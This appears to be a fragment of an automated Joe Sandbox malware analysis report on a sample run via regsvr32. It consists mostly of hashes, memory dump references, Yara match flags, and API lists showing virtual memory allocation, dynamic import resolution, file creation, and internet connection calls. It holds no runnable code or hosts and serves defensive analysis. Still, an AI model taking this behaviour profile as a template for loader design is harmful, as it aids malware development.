                                                                                • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                                                • Instruction Fuzzy Hash: E3115132954682CADF60DF75D8801B927F0FB96B84F589532EA1E4B7A9CF64E981C700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _free_nolock
                                                                                • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                                                                • API String ID: 2882679554-3458198949
                                                                                • Opcode ID: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                                                • Instruction ID: eeecd72c6780815783a1fae5c48eb349e963c9509e79177bfa487a3189f7f6a0
                                                                                • Opcode Fuzzy Hash: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                                                • Instruction Fuzzy Hash: C7012121A2C78286EB509B64E88472AA3F0F791390F448535EA8D42F9DDFFCF4048B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:15.7%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:4%
                                                                                Total number of Nodes:101
                                                                                Total number of Limit Nodes:11

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.704097752.0000000000570000.00000040.00001000.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_570000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                • API String ID: 394283112-2517549848
                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                • Instruction ID: 6fa639c0e9fa009ac563b468a8e51fbb29dee1bfae8140a8a3478c002ca4d3e7
                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                • Instruction Fuzzy Hash: B572E630618B48CFDB19DF18D8856B9BBE1FB98305F10962DE88ED7251DB34E942CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: O}$X$bW
                                                                                • API String ID: 0-980370356
                                                                                • Opcode ID: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                                                • Instruction ID: a62d154362f2d503ef0efb6b3a203e4a1ee478d45050cbe1ab820923c54e17f6
                                                                                • Opcode Fuzzy Hash: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                                                • Instruction Fuzzy Hash: AA02F4715087C88BD799CFA8C48A69EFBE1FB98744F104A1DF4868B260D7F4D949CB42
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "Gd$C2$HG
                                                                                • API String ID: 0-142661339
                                                                                • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                                • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                                                • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                                • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $!$e##
                                                                                • API String ID: 0-2900154246
                                                                                • Opcode ID: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                                                • Instruction ID: 216da8bcfa57d9aa83ad41f20fe658cab1eb670466840fb7186bd91b9371edf3
                                                                                • Opcode Fuzzy Hash: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                                                • Instruction Fuzzy Hash: 7B8190705187889BD7E8DF14C4C979EBBE1FB98344F905A1CF89A8B261CB74C948CB42
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 403 18002446c-1800244c1 call 18001feb0 406 1800244c7-180024552 call 180026974 403->406 407 180024558-18002456e InternetOpenW 403->407 406->407
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InternetOpen
                                                                                • String ID: &J@$Va$Z*
                                                                                • API String ID: 2038078732-1197100596
                                                                                • Opcode ID: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                                                • Instruction ID: 28a15b3c09fe6a2aa9f5eb42736a691d582ff290fd3432c8dba93e18a197623f
                                                                                • Opcode Fuzzy Hash: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                                                • Instruction Fuzzy Hash: 8A212F715187898FD3A8DF28C0493ABB7E1FB98319F408A1DE4CAC6391DB799448CB06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 629 18001bf0c-18001bfb0 call 18001feb0 632 18001bfb2-18001c02b call 180026974 629->632 633 18001c031-18001c063 CreateFileW 629->633 632->633
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: `/
                                                                                • API String ID: 823142352-1163903809
                                                                                • Opcode ID: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                                                • Instruction ID: f11eb3e7a352e1f1819d3b1e5829977cbaca57bf71308e5d5317c3bcacfeb84e
                                                                                • Opcode Fuzzy Hash: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                                                • Instruction Fuzzy Hash: 6C3137B061CB848FD364DF18D48579ABBE0FB88314F504A2EE88DC3362DB749845CB86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ConnectInternet
                                                                                • String ID:
                                                                                • API String ID: 3050416762-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InformationVolume
                                                                                • String ID:
                                                                                • API String ID: 2039140958-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HttpOpenRequest
                                                                                • String ID:
                                                                                • API String ID: 1984915467-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%